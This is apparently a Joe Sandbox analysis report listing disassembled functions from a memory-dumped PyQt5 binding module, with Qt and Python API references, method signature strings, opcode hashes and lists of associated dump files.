String ID: BiJ3$BiJ:$QStandardItem$insertRow$insertRow(self, row: int, items: Iterable[QStandardItem])insertRow(self, arow: int, aitem: Optional[QStandardItem])
API String ID: 1324998375-2342085720
Opcode ID: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
Instruction ID: 83c1bd554bdeec2abfbda480e81b4fbe0372b8bef8d069201ce19f588212c349
Opcode Fuzzy Hash: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
Instruction Fuzzy Hash: 9F4136B6618F8681EB60CF61E8881AE73A8FB89B84F514176CA9D43724DF3DD449C740

Function 00007FFB9A2FDB00 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

?format@QWindow@@UEBA?AVQSurfaceFormat@@XZ.QT5GUI ref: 00007FFB9A2FDB93
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A2FDB9F
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A2FDBBD
??1QSurfaceFormat@@QEAA@XZ.QT5GUI ref: 00007FFB9A2FDBCB

Strings

QWindow, xrefs: 00007FFB9A2FDC10
format, xrefs: 00007FFB9A2FDC09
format(self) -> QSurfaceFormat, xrefs: 00007FFB9A2FDBFD

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Brush@@Format@@SurfaceV0@@$?format@Window@@
String ID: QWindow$format$format(self) -> QSurfaceFormat
API String ID: 3398123277-2872225233
Opcode ID: 452d04ecb1dac621049442443a89a2f238008f587689e14a4782cb4659b55dc9
Instruction ID: 0e2aeb71bd71c9752f6aebfa827d723cf89a72fc22bd3d00361254248ed94859
Opcode Fuzzy Hash: 452d04ecb1dac621049442443a89a2f238008f587689e14a4782cb4659b55dc9
Instruction Fuzzy Hash: 5C3149A1708B4681EB609B25E8481AA77A9EF85BC4F544071DE8E43764DF6CE089D700

Function 00007FFB9A2E3B10 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

PyLong_AsVoidPtr.PYTHON3 ref: 00007FFB9A2E3B91
PyErr_Occurred.PYTHON3 ref: 00007FFB9A2E3B9A
PyErr_Clear.PYTHON3 ref: 00007FFB9A2E3BA5

Strings

Bii|P0, xrefs: 00007FFB9A2E3B67
createIndex(self, row: int, column: int, object: Any = None) -> QModelIndex, xrefs: 00007FFB9A2E3C01
QStandardItemModel, xrefs: 00007FFB9A2E3C14
createIndex, xrefs: 00007FFB9A2E3C0D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Err_$ClearLong_OccurredVoid
String ID: Bii|P0$QStandardItemModel$createIndex$createIndex(self, row: int, column: int, object: Any = None) -> QModelIndex
API String ID: 89242240-3839368874
Opcode ID: cbbfed5397f9271a267e78a1c124a35b2db617ee14828de433fefa6e03ea89db
Instruction ID: 2a7e9f51235ae7de35c2ec07600b3350bb770eb094f233ef51e5d3ad52777858
Opcode Fuzzy Hash: cbbfed5397f9271a267e78a1c124a35b2db617ee14828de433fefa6e03ea89db
Instruction Fuzzy Hash: 90314CB6B09B5285EB20CF21E4883AD37A8FB49780F56817ACA9D03320DF3CD498C750

Function 00007FFB9A337B20 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@AEBVQStringList@@@Z.QT5CORE ref: 00007FFB9A337B9A
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A337BAB
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A337BB6

Strings

QTextCharFormat, xrefs: 00007FFB9A337C15
BJ1, xrefs: 00007FFB9A337B35
setFontFamilies, xrefs: 00007FFB9A337C0E
setFontFamilies(self, families: Iterable[Optional[str]]), xrefs: 00007FFB9A337C02

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Variant@@$?setFormat@@List@@@Property@StringTextVariant@@@
String ID: BJ1$QTextCharFormat$setFontFamilies$setFontFamilies(self, families: Iterable[Optional[str]])
API String ID: 2160437431-2972902074
Opcode ID: 638554b5b6b0e67c153ef2bcdba53bc352e54532c96e0c18f86735c5db56c108
Instruction ID: b86d02fc6f7d070919b84d3fc32d4e966bfb839c603710711ec76328605b2d0a
Opcode Fuzzy Hash: 638554b5b6b0e67c153ef2bcdba53bc352e54532c96e0c18f86735c5db56c108
Instruction Fuzzy Hash: 6831F5B6B08F9681EB60CF65E8881A933B8FB49B84FA14176CA5D43724DF3CD549C740

Function 00007FFB9A35FC90 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFB9A35FCE4
?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFB9A35FCF2
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9A35FCFE

Strings

QDoubleValidator, xrefs: 00007FFB9A35FD78
sender, xrefs: 00007FFB9A35FD71
qtcore_qobject_sender, xrefs: 00007FFB9A35FD21
sender(self) -> Optional[QObject], xrefs: 00007FFB9A35FD65

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Eval_Thread$?sender@Object@@RestoreSave
String ID: QDoubleValidator$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
API String ID: 10903585-2772519645
Opcode ID: 68b8db9e18bc0a87ffa48f4b0ff0b1ba1b9fcb9a72ca79803255c5c48f2ee483
Instruction ID: b812a87bc4dd59db8239bb86fa3f7f7a12a90c96a3f0c7893f140d795b0637e3
Opcode Fuzzy Hash: 68b8db9e18bc0a87ffa48f4b0ff0b1ba1b9fcb9a72ca79803255c5c48f2ee483
Instruction Fuzzy Hash: 25213EB5B09B46C1EB60CF25E89866933A8FB59B94FA440B6CE4D03724DF3CE549C700

Function 00007FFB9A2D79C0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON3 ref: 00007FFB9A2D7A14
?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFB9A2D7A22
PyEval_RestoreThread.PYTHON3 ref: 00007FFB9A2D7A2E

Strings

sender(self) -> Optional[QObject], xrefs: 00007FFB9A2D7A95
QIntValidator, xrefs: 00007FFB9A2D7AA8
sender, xrefs: 00007FFB9A2D7AA1
qtcore_qobject_sender, xrefs: 00007FFB9A2D7A51

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Eval_Thread$?sender@Object@@RestoreSave
String ID: QIntValidator$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
API String ID: 10903585-4223726384
Opcode ID: 5f70567fe0c24c26a62ca6895f4f0bf7e1c7748cf3356f83b1fc2d7e6237f61a
Instruction ID: 3f93d38bb52f24a0844cc905305dd73b31738f267a9e8489a67ad4f6cd6c34ad
Opcode Fuzzy Hash: 5f70567fe0c24c26a62ca6895f4f0bf7e1c7748cf3356f83b1fc2d7e6237f61a
Instruction Fuzzy Hash: CA214CB5B08B4680EB60CF21E84866933A8FB9AB94F5440B2CE4D47320DF3CD149C340

Function 00007FFB9A2D7AC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

??A?$QVector@VQPointF@@@@QEAAAEAVQPointF@@H@Z.QT5CORE ref: 00007FFB9A2D7B43
??0QPolygonF@@QEAA@XZ.QT5GUI ref: 00007FFB9A2D7BF4
??A?$QVector@VQPointF@@@@QEAAAEAVQPointF@@H@Z.QT5CORE ref: 00007FFB9A2D7C15
?append@?$QVector@VQPointF@@@@QEAAXAEBVQPointF@@@Z.QT5CORE ref: 00007FFB9A2D7C21

Strings

__getitem__, xrefs: 00007FFB9A2D7C71
QPolygonF, xrefs: 00007FFB9A2D7C7D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Point$F@@@@Vector@$?append@?$F@@@Polygon
String ID: QPolygonF$__getitem__
API String ID: 3069565249-1125083749
Opcode ID: da13391782f449ba148e81d7404c23b71cafb5acdeea17eb7d355e3f5dd026e4
Instruction ID: 4fa6c71520b607c150c0a3679ee35f73c7a586773806fdd0a0083f69f3c11a54
Opcode Fuzzy Hash: da13391782f449ba148e81d7404c23b71cafb5acdeea17eb7d355e3f5dd026e4
Instruction Fuzzy Hash: F9511F76B0CB9686EB508F25E48416A77A5FB89BC4F548176DE4D43B28DF3CE045CB00

Function 00007FFB9A333AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFB9A333B07
??_0QVector3D@@QEAAAEAV0@M@Z.QT5GUI ref: 00007FFB9A333B8D
??_0QVector3D@@QEAAAEAV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A333BE2

Strings

1J9, xrefs: 00007FFB9A333BBA

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ??_0Vector3$SubtypeType_V0@@
String ID: 1J9
API String ID: 2671363276-2407233842
Opcode ID: d63ec71e5b9591f32adac0eef95a3954b7f486ea87113df824d8fb0f32220d3b
Instruction ID: 811e8b3b6b7806c1bc378b95b7195451d8ce1938b0806bb61f7bfeec11584381
Opcode Fuzzy Hash: d63ec71e5b9591f32adac0eef95a3954b7f486ea87113df824d8fb0f32220d3b
Instruction Fuzzy Hash: CF413FA6A0CA5682EB609B66F844169B374FB89BD4F498072DF4D03B78DF7CD485D700

Function 00007FFB9A341B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFB9A341BB7
??XQVector2D@@QEAAAEAV0@M@Z.QT5GUI ref: 00007FFB9A341C3D
??XQVector2D@@QEAAAEAV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A341C92

Strings

1J9, xrefs: 00007FFB9A341C6A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Vector2$SubtypeType_V0@@
String ID: 1J9
API String ID: 2383268015-2407233842
Opcode ID: abafc35d9303f6d683e09387b14fb797e3e153cecf983f7f40c33f414fc87d77
Instruction ID: d203c049d8ecfc185f461692af2e110e99bcc0949121c7f725b7da66c1d9ad94
Opcode Fuzzy Hash: abafc35d9303f6d683e09387b14fb797e3e153cecf983f7f40c33f414fc87d77
Instruction Fuzzy Hash: 71412EA660CE5681EB609B66F844169B3B8FB89BD4F084072DE4D17B68DF7CE485C700

Function 00007FFB9A2F9B80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFB9A2F9BA7
??XQTransform@@QEAAAEAV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A2F9C38
??XQTransform@@QEAAAEAV0@N@Z.QT5GUI ref: 00007FFB9A2F9C82

Strings

1J9, xrefs: 00007FFB9A2F9C08

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
